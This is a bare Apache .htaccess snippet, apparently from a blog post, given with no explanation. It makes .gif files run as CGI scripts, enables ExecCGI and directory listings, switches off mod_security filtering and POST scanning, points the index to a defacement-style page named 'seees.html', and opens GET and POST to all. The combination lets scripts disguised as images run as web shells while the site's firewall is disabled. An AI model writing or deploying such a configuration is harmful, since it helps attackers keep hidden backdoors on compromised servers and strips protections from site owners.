Code:
Options +FollowSymLinks
DirectoryIndex seees.html
AddType application/x-httpd-cgi .gif
AddHandler cgi-script .gif
AddHandler cgi-script .gif
Options FollowSymLinks MultiViews Indexes ExecCGI
Options +FollowSymLinks
DirectoryIndex seees.html
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
<Limit GET POST>
order deny,allow
deny from all
allow from all
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>
Post a Comment